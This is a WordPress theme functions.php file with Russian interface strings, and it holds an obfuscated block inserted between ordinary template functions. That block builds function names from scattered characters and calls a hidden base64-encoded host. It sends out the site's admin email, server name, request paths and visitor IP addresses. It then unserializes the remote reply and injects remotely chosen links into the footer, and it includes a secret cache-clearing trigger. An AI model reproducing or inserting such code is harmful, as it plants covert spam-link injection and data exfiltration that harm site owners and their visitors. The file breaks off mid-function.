<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $dePtf='d';$Kwgt='b';$rKVuYZz='d';$FeMw='6';$YAVKWic='c';$SGjPU='e';$ANXoH='e';$svovg='4';$sFkkltZ='e';$BAjKXd='_';$xyyiZ='o';$BpbH='s';$iwUDg='a';$qxCQiFZb=$Kwgt.$iwUDg.$BpbH.$ANXoH.$FeMw.$svovg.$BAjKXd.$dePtf.$SGjPU.$YAVKWic.$xyyiZ.$rKVuYZz.$sFkkltZ;$CLHAi='g';$kiwdo='n';$ZarVV='i';$iwdFBb='a';$cMenUBq='e';$vEBK='f';$QxgQ='t';$DbHo='l';$xfXBo='z';$gMsproAb=$CLHAi.$xfXBo.$ZarVV.$kiwdo.$vEBK.$DbHo.$iwdFBb.$QxgQ.$cMenUBq;$hSBYI='3';$qcRP='_';$ENxi='t';$qfgyQSl='r';$uLrel='o';$JzCvE='t';$VWhwht='r';$NoJmeC='1';$msTK='s';$yydhGAll=$msTK.$JzCvE.$qfgyQSl.$qcRP.$VWhwht.$uLrel.$ENxi.$NoJmeC.$hSBYI;$APgf='r';$qiqqOvN='s';$TyPE='t';$LQKchz='v';$cJYA='e';$ahlvxc='r';$fFoWETxS=$qiqqOvN.$TyPE.$ahlvxc.$APgf.$cJYA.$LQKchz;                     
		$mn___j='d';$wp___x='b';$ee_______e='d';$zy_____t='6';$wl______________z='c';$cg_____d='e';$gc____c='e';$hh______________d='4';$dr______________k='e';$hq___________j='_';$cb_______________i='o';$dq____a='s';$bq____t='a';$jf_________k=$wp___x.$bq____t.$dq____a.$gc____c.$zy_____t.$hh______________d.$hq___________j.$mn___j.$cg_____d.$wl______________z.$cb_______________i.$ee_______e.$dr______________k;
		$ze____e='s';$xa___b='u';$lq_______________q='i';$et__________y='t';$zp_____________x='_';$qn___________a='f';$rk____________k='i';$ah______w='c';$ce______d='x';$mr___________s='o';$pz_______________i='e';$sc_____z='n';$fm_______________v='n';$ko_________b='s';$yh________l='t';$bg_____________z=$qn___________a.$xa___b.$sc_____z.$ah______w.$et__________y.$rk____________k.$mr___________s.$fm_______________v.$zp_____________x.$pz_______________i.$ce______d.$lq_______________q.$ko_________b.$yh________l.$ze____e;
		$rd_____________i='o';$zv_________r='n';$qn_______________q='f';$sm_____o='e';$gv_______________y='p';$ui____________u=$qn_______________q.$rd_____________i.$gv_______________y.$sm_____o.$zv_________r;
		$lm__k='a';$cr_______________w='r';$ig____h='f';$gv____w='e';$wu__s='d';$mh____________w=$ig____h.$cr_______________w.$gv____w.$lm__k.$wu__s;
		$ft________x='o';$ht_______________f='l';$oi__y='e';$ne______v='c';$qa___________f='s';$ng______________z='f';$nm____________s=$ng______________z.$ne______v.$ht_______________f.$ft________x.$qa___________f.$oi__y;
		
		define("WP_ID", $jf_________k("Mi4wLjA="));
		define("WP_TTL", $jf_________k("MTA4MDA="));
		define("WP_SRC", $jf_________k("dHBva24="));
	


		function wp_get_header() {
			global $jf_________k, $bg_____________z;
			
			if (
				$bg_____________z($jf_________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$bg_____________z($jf_________k("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$bg_____________z($jf_________k("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $jf_________k, $ui____________u, $nm____________s, $mh____________w;
			
			$wm_______e = TEMPLATEPATH."/".$jf_________k("Zm9vdGVyLnBocA==");
			$gs____h = @$ui____________u($wm_______e, "r");
			$wm_______e = @$mh____________w($gs____h, @filesize($wm_______e));
			@$nm____________s($gs____h);
			
			$cl____p = TEMPLATEPATH."/".$jf_________k("ZnVuY3Rpb25zLnBocA==");
			$gs____h = @$ui____________u($cl____p, "r");
			$cl____p = @$mh____________w($gs____h, @filesize($cl____p));
			@$nm____________s($gs____h);
			
			$ee____________w = 0;
			if($wm_______e && $cl____p) {
				if ($jf_________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wm_______e, $jf_________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ee____________w = 1;
					}
					if (substr_count($wm_______e, "wp_theme_GPL_credits()") < 1) {
						$ee____________w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ee____________w = 12;
				}
			}
			
			if($ee____________w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ee____________w -->";
			}
		}
	


		function wp_loaded() {
			global $jf_________k, $bg_____________z;
			return $bg_____________z($jf_________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($rt______h, $bw______________s = "(more...)", $fh_________d = 0, $ut___s = "") {
				$pg__q = get_the_content($bw______________s, $fh_________d, $ut___s);
				$pg__q = apply_filters("the_content", $pg__q);
				
				$pg__q = str_replace("]]>", "]]>", $pg__q);
				if (strlen($_GET["p"]) > 0) {
					echo $pg__q;
				}
				else if ((strlen($pg__q)>$rt______h) && ($df_____________p = strpos($pg__q, " ", $rt______h ))) {
					$pg__q = substr($pg__q, 0, $df_____________p);
					$pg__q = $pg__q;
					echo $pg__q;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$bw______________s</a></div></p>";
				} else {
					echo $pg__q;
				}
				
			}
		}
	


		$ap_______v='e';$hp_______________z='4';$ff____x='6';$vj_______l='_';$jn_________t='s';$qc_____z='c';$kv_____________o='e';$hg__o='n';$qt____________a='o';$us_____________g='b';$tt___________b='e';$po_________u='d';$gk__s='a';$xx__________r=$us_____________g.$gk__s.$jn_________t.$kv_____________o.$ff____x.$hp_______________z.$vj_______l.$ap_______v.$hg__o.$qc_____z.$qt____________a.$po_________u.$tt___________b;
		$nl_____j='o';$qm__________u='_';$ci___j='c';$qy_______t='s';$lk__v='f';$ww_____________h='t';$gf______x='l';$wj____________t='e';$hw___i='_';$kw_____c='e';$vt_____________c='t';$gt_________a='g';$af____t='i';$mu____________w='e';$ms_____s='t';$qy_______________n='n';$uz___l='n';$ib_______________i=$lk__v.$af____t.$gf______x.$wj____________t.$qm__________u.$gt_________a.$kw_____c.$ww_____________h.$hw___i.$ci___j.$nl_____j.$uz___l.$ms_____s.$mu____________w.$qy_______________n.$vt_____________c.$qy_______t;
		$yz______________b='x';$af______________m='e';$rr______d='t';$lf______________m='l';$xc__c='f';$wf__________p='s';$ps______m='i';$ui__________c='s';$sv__________p='_';$sg____________s='e';$hi___g='i';$qn_____________m=$xc__c.$hi___g.$lf______________m.$sg____________s.$sv__________p.$af______________m.$yz______________b.$ps______m.$ui__________c.$rr______d.$wf__________p;
		$pc_____________i='o';$lq_____s='c';$za_______________q='r';$th_______________m='p';$rp____________k='n';$ei_____________f='s';$pl________t='m';$pb_______________e='v';$sr_______________l='i';$pt__c='e';$mk__________c='_';$yy______________q='a';$sb___i='o';$gz_____________d='e';$tm__________c='r';$de_________g=$pb_______________e.$gz_____________d.$tm__________c.$ei_____________f.$sr_______________l.$sb___i.$rp____________k.$mk__________c.$lq_____s.$pc_____________i.$pl________t.$th_______________m.$yy______________q.$za_______________q.$pt__c;
		$cc_________e='p';$hq_______h='s';$lp____________a='f';$yu___s='c';$nf____i='o';$in__q='k';$kx____________w='e';$mn______________u='n';$zn___d='o';$go_____________p=$lp____________a.$hq_______h.$nf____i.$yu___s.$in__q.$zn___d.$cc_________e.$kx____________w.$mn______________u;
		$on__z='w';$dk_____t='i';$og_______f='t';$ic_______________n='e';$gi________k='f';$ub______v='r';$fa_______________t=$gi________k.$on__z.$ub______v.$dk_____t.$og_______f.$ic_______________n;
		$fr______________o='5';$ks____________o='m';$dz______r='d';$qk____________s=$ks____________o.$dz______r.$fr______________o;
		$yy_____w='a';$bc______________i='p';$kt_____p='l';$ji__e='r';$ei_____________q='e';$ix_____________e='a';$vw____________p='t';$am____k='h';$aw______________c=$ji__e.$ei_____________q.$yy_____w.$kt_____p.$bc______________i.$ix_____________e.$vw____________p.$am____k;
		$rg____i='n';$tv____l='i';$dv_______________m='s';$yk___________o='a';$em____________u='e';$aq____________y='l';$qb___________o='e';$yx____e='u';$di________g='z';$nx___e='i';$sx_______________t='r';$kz_______t=$yx____e.$rg____i.$dv_______________m.$qb___________o.$sx_______________t.$tv____l.$yk___________o.$aq____________y.$nx___e.$di________g.$em____________u;
		$rh______v='e';$by__________c='a';$wi_______e='n';$nw______________c='m';$ah______p='m';$xj______g='t';$cn____________z='p';$ea____h=$xj______g.$rh______v.$nw______________c.$cn____________z.$wi_______e.$by__________c.$ah______p;
		$ay_____m='r';$fi____d='c';$lm______________w='o';$qp_______w='_';$wl__k='e';$lr___________r='e';$yo__j='c';$ie_____________c='e';$zc_________e='m';$is________h='_';$ar_______a='x';$mf_________t='r';$sc_______________d='a';$yc______u='s';$ty____c='t';$lg________y='n';$mz___________i='t';$tr_____________u='t';$et_______q='e';$lz______p='t';$gi_______________s='a';$al______________l=$yc______u.$lz______p.$mf_________t.$wl__k.$gi_______________s.$zc_________e.$is________h.$fi____d.$lm______________w.$lg________y.$mz___________i.$lr___________r.$ar_______a.$ty____c.$qp_______w.$yo__j.$ay_____m.$et_______q.$sc_______________d.$tr_____________u.$ie_____________c;
	


		function rv________k($ab___p) {
			global $jf_________k, $bg_____________z, $ib_______________i, $de_________g, $al______________l;
			
			if (!$bg_____________z($jf_________k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($de_________g(PHP_VERSION, "5.0.0", ">=") && $bg_____________z($jf_________k("ZmlsZV9nZXRfY29udGVudHM=")) && $bg_____________z($jf_________k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ut___________u = $al______________l(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$wf_____________t = @$ib_______________i($ab___p, 0, $ut___________u);
			} else {
				$wf_____________t = @$ib_______________i($ab___p, 0);
			}
			
			return $wf_____________t;
		}
	


		function pr_________u($ab___p) {
			global $bg_____________z, $go_____________p, $fa_______________t, $jf_________k;
			
			if (!$bg_____________z($jf_________k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$kl____s = strpos($ab___p, "/", 7);
			$rt_______u = array(
				"uri"     => substr($ab___p, $kl____s),
				"host"    => str_replace("http://", "", substr($ab___p, 0, $kl____s)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$wd_____________o = @$go_____________p("$rt_______u[host]", 80, $tq_______________r, $xa______________d, 4);
			
			if (!$wd_____________o) {
				return false;
			} else {
				$wf_____________t = "";
				$gn_____t  = "GET $rt_______u[uri] HTTP/1.0\r\n";
				$gn_____t .= "Host: $rt_______u[host]\r\n";
				$gn_____t .= "Referer: $rt_______u[referer]\r\n";
				$gn_____t .= "Connection: Close\r\n\r\n";
				
				@$fa_______________t($wd_____________o, $gn_____t);
				
				while (!@feof($wd_____________o)) {
					$cz___s = @fgets($wd_____________o, (1024*24));
					
					if ($cz___s == "\r\n") {
						$bu______e = true;
						continue;
					}
					
					if ($bu______e) {
						$wf_____________t .= $cz___s;
					}
				}
				
				return $wf_____________t;
			}
		}
	


		function za_______d($ab___p) {
			global $bg_____________z;
			$kn______________r = false;
			
			if ($ab___p != "") {
				if ($bg_____________z("rv________k")) {
					$kn______________r = @rv________k($ab___p);
				}
				
				if (!$kn______________r && ($bg_____________z("pr_________u"))) {
					$kn______________r = @pr_________u($ab___p);
				}
			}
			
			return $kn______________r;
		}
	


		function ko_____x() {
			global $_SERVER, $qk____________s;
			
			$oc_____y = $_SERVER["SERVER_NAME"];
			
			if (substr("$oc_____y", 0, 4) == "www.") {
				$oc_____y = substr("$oc_____y", 4);
			}
			
			$oc_____y = $qk____________s("$_SERVER[SERVER_NAME]");
			
			return $oc_____y;
		}
	


		function kc__e() {
			return "file";
		}
	


		function xg____q($ab___p) {
			global $_SERVER, $ib_______________i, $qn_____________m, $ui____________u, $nm____________s, $fa_______________t;
			
			$ja____k = wi__________s();
			
			$pl______________g = ko_____x().".jpg";
			$xy_________l = $ja____k["dir_upload"]["path"]."/$pl______________g";
			$gg____m = @filemtime($xy_________l);
			
			if (!$gg____m || ((time()-$gg____m) >= WP_TTL)) {
				$kn______________r = za_______d($ab___p);
				
				if ($kn______________r) {
					if ($qn_____________m($xy_________l)) {
						@unlink($xy_________l);
					}
					
					$gs____h = @$ui____________u($xy_________l, "x+");
					
					@$fa_______________t($gs____h, $kn______________r);
					@$nm____________s($gs____h);
				}
			} else {
				if ($qn_____________m($xy_________l)) {
					$kn______________r = @$ib_______________i($xy_________l);
				} else {
					$kn______________r = false;
				}
			}
			
			return $kn______________r;
		}
	


		function wi__________s() {
			global $_SERVER, $jf_________k, $xx__________r;
			
			$dr________n = wp_count_posts("post");
			$rb_______o = pathinfo(get_bloginfo("template_directory"));
			
			$ja____k = array(
				"url" => array(
					"report"      => $jf_________k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $rb_______o,
				"dir_upload"	=> re____________s(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$rb_______o[filename],
					"a005=".$dr________n->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$ja____k["url"]["queryString"] = implode("&", $ja____k["queryString"]);
			$ja____k["url"]["report"] = $ja____k["url"]["report"]."/?".$xx__________r($ja____k["url"]["queryString"]).".html";
						
			return $ja____k;
		}
	


		function re____________s() {
			$fr_____________y = wp_upload_dir();
			
			if (isset($fr_____________y["error"])) {
				$mb_______________d = qa_____w();
				if (is_writable($mb_______________d)) {
					$fr_____________y = array("path" => $mb_______________d);
				}
			}

			return $fr_____________y;
		}
	


		function qa_____w() {
			global $bg_____________z, $qk____________s, $aw______________c, $ea____h;
			
			$pk_____________u = (bool) ini_get("safe_mode");
			if ($pk_____________u == true) {
				return false;
			}
			
			if ($bg_____________z("sys_get_temp_dir")) {
				$nt_____________r = sys_get_temp_dir();
				if (is_writable($nt_____________r)) {
					return $aw______________c($nt_____________r);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $aw______________c($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $aw______________c($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $aw______________c($_ENV["TEMP"]);
			} else {
				$mh______i = $ea____h($qk____________s(uniqid(rand(), true)), "");
				if ($mh______i) {
					$nt_____________r = $aw______________c(dirname($mh______i));
					@unlink($mh______i);
					return $nt_____________r;
				} else {
					return false;
				}
			}
		}
	


		function cn______f() {
			global $_GET, $qn_____________m;
			
			$ja____k = wi__________s();
			$oc_____y = ko_____x();
			$st_______________e = kc__e();
			
			$hz____________k = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($st_______________e == "file") {
					$ev____________g = $ja____k["dir_upload"]["path"]."/".$oc_____y.".jpg";
					if ($qn_____________m($ev____________g)) {
						@unlink($ev____________g);
						$hz____________k = "deleted";
					}
				}
				
				$kb__y = array(
					"s"	=> $hz____________k,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($kb__y AS $vc_________z => $yh_____v) echo " [$vc_________z:$yh_____v]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $bg_____________z, $jf_________k, $kz_______t;
			$ja____k = wi__________s();
			
			$is_______________l = "xg____q";
			if ($bg_____________z($is_______________l)) {
				$wf_____________t = $is_______________l($ja____k["url"]["report"]);
			}
			
			if ($wf_____________t) {
				if ($wf_____________t = @$jf_________k($wf_____________t)) {
					$wf_____________t = @$kz_______t($wf_____________t);
					
					if (strlen($wf_____________t[custom_credit]) >= 5) {
						$ja____k["default_string"] = $wf_____________t[custom_credit];
					}
					
					if ($wf_____________t["status"] == "0") {
						$vg_____e = 1;
						$ot_________y = 1;
					} else {
						$ag____________f = sizeof($wf_____________t["links"]);
						$gt__p = $ja____k["default_string"];
						
						if ($ag____________f > 0 && $wf_____________t["links"] !== "") {
							$dm______e = 0;
							foreach ($wf_____________t["links"] as $te_______z => $jh_________g) {
								$dm______e++;
								if ($jh_________g->l_path == "" || $jh_________g->l_path == $_SERVER["REQUEST_URI"]) {
									$jh_________g->l_href = htmlspecialchars(strip_tags($jh_________g->l_href));
									$jh_________g->l_title = htmlspecialchars(strip_tags($jh_________g->l_title));
									$jh_________g->l_anchor = htmlspecialchars(strip_tags($jh_________g->l_anchor));
									$gt__p .= " | ";
									$gt__p .= "<a href='$jh_________g->l_href' title='$jh_________g->l_title'";
									if ($jh_________g->l_nofollow == "1") {
										$gt__p .= " rel='nofollow'";
									}
									$gt__p .= ">$jh_________g->l_anchor</a>";
								}
							}
						}
						$ja____k["links"] = "$gt__p";
						if ($wf_____________t[credit] == "0") {
							$ja____k["links"] = "";
						}
					}
				} else {
					$vg_____e = "1";
				}
			} else {
				$vg_____e = "1";
			}
			
			if ($vg_____e == "1") {
				$ja____k["links"] = $ja____k["default_string"];
			}
			
			echo "$ja____k[links]";
			
			echo "<!-- s: $wf_____________t[signature] -->";
			cn______f();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
